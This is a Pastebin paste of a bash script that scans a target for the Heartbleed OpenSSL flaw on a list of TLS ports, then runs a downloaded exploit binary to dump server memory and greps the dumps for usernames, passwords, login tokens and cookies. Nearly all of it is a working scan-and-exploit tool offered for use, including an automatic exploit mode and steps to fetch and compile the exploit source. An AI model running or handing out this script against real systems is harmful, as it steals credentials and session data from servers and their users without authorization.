SHARE
TWEET

SCAN + EXPLOIT Heartbleed OpenSSL 1.0.1

Googleinurl May 6th, 2014 1,522 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Heartbleed
  2.  
  3. #Affected OpenSSL versions
  4.  
  5. #The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
  6. #Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
  7. #Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
  8.  
  9. # Scan and exploit
  10.  
  11.  
  12. # ./hbse 127.0.0.1 # Interactive mode.
  13. # ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
  14. # ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
  15.  
  16.  
  17. # Requirements
  18.  
  19. # apt-get install nmap
  20. # wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
  21. # mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
  22. # wget http://nmap.org/svn/nselib/tls.lua
  23. # mv tls.lua /usr/share/nmap/nselib/.
  24. # wget -O heartbleed.c http://www.exploit-db.com/download/32791
  25. # gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
  26.  
  27. # SCRIPT
  28.  
  29. # cat hbse
  30. #!/bin/bash
  31.  
  32. ### TCP ####
  33.  
  34. # 443  (HTTPS - HTTP over SSL)
  35. # 465  (SMTPS - SMTP over SSL)
  36. # 563  (NNTPS - NNTP over TLS/SSL)
  37. # 636  (LDAPS - LDAP over TLS/SSL)
  38. # 989  (FTPS Data - FTP Data over TLS/SSL)
  39. # 990  (FTPS Control - FTP Control over TLS/SSL)
  40. # 992  (Telnet over TLS/SSL)
  41. # 993  (IMAPS - IMAP over SSL)
  42. # 995  (POP3S - POP3 over SSL)
  43. # 1194 (OpenVPN)
  44. # 2484 (Oracle Database listening for SSL client)
  45. # 5061 (SIP over TLS)
  46. # 8443 (Apache Tomcat SSL)
  47.  
  48. ### UDP ###
  49.  
  50. # 563  (NNTPS - NNTP over TLS/SSL)
  51. # 636  (LDAPS - LDAP over TLS/SSL)
  52. # 4433 (OpenSSL)
  53.  
  54. if [ $# -eq 1 ]; then
  55.     ip="$1"
  56. elif [ $# -eq 2 ]; then
  57.     se="$1"
  58.     ip="$2"
  59. else
  60.     exit
  61. fi
  62. nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"
  63.  
  64. function print() {
  65.     text="$1"
  66.     color="$2"
  67.     if [ "$color" == "gray" ]; then
  68.         header="\e[38;5;250m"
  69.     elif [ "$color" == "red" ]; then
  70.         header="\e[91m"
  71.     elif [ "$color" == "green" ]; then
  72.         header="\e[92m"
  73.     elif [ "$color" == "yellow" ]; then
  74.         header="\e[93m"
  75.     fi
  76.     tail="\e[0m"
  77.     echo -en $header$text$tail
  78. }
  79.  
  80. print "Checking if $ip is vulnerable on port 443... " "gray"
  81. vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
  82.  
  83. if [ "$vulnerable" != "" ]; then
  84.     print "Yes\n" "green"
  85.     print "Checking if it is vulnerable on other ports... " "gray"
  86.     vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
  87.     n="`echo "$ports" | wc -l`"
  88.     if [ "$n" == 1 ]; then
  89.         print "No\n" "red"
  90.         w1="port"
  91.         w2="it"
  92.         w3="file"
  93.     else
  94.         print "Yes\n" "green"
  95.         w1="ports"
  96.         w2="them"
  97.         w3="files"
  98.     fi
  99.     print "Vulnerable $w1:\n" "gray"
  100.     print "$vports\n" "green"
  101.     if [ "$se" == "--scan" ]; then exit
  102.     elif [ "$se" == "--exploit" ]; then
  103.         answer="Y"
  104.     else
  105.         print "Do you want to exploit $w2? [Yn] " "gray"
  106.         read answer
  107.     fi
  108.     if [ "$answer" = "Y" ]; then
  109.         print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
  110.         exec 3<<< "$vports"
  111.         while read port <&3; do
  112.             print "+ Port [$port]\n" "gray"
  113.             ofile="$ip.$port"
  114.             if [ -f $ofile ]; then rm -f $ofile; fi
  115.             if [ "$port" == "465" ]; then
  116.                 precmd='-c 0'
  117.             elif [ "$port" == "993" ]; then
  118.                 precmd='-c 2'
  119.             elif [ "$port" == "995" ]; then
  120.                 precmd='-c 1'
  121.             else
  122.                 precmd=''
  123.             fi
  124.             ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
  125.             if [ -f $ofile ]; then
  126.                 r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
  127.                 print "$r\n" "green"
  128.                 if [ "$se" != "--exploit" ]; then
  129.                     print "Do you want to less the hexdump file? [Yn] " "gray"
  130.                     read answer
  131.                     if [ "$answer" = "Y" ]; then
  132.                         hexdump -C $ofile | less
  133.                     fi
  134.                 fi
  135.             else
  136.                 print "Error: heartbleed did not work on port $port...\n" "yellow"
  137.             fi
  138.         done
  139.         if [ "$se" != "--exploit" ]; then
  140.             print "Do you want to delete the hexdump $w3? [Yn] " "gray"
  141.             read answer
  142.             if [ "$answer" = "Y" ]; then
  143.                 rm -f $ip.*
  144.             fi
  145.         fi
  146.     fi
  147. else
  148.     print "No\n" "red"
  149. fi
RAW Paste Data
Top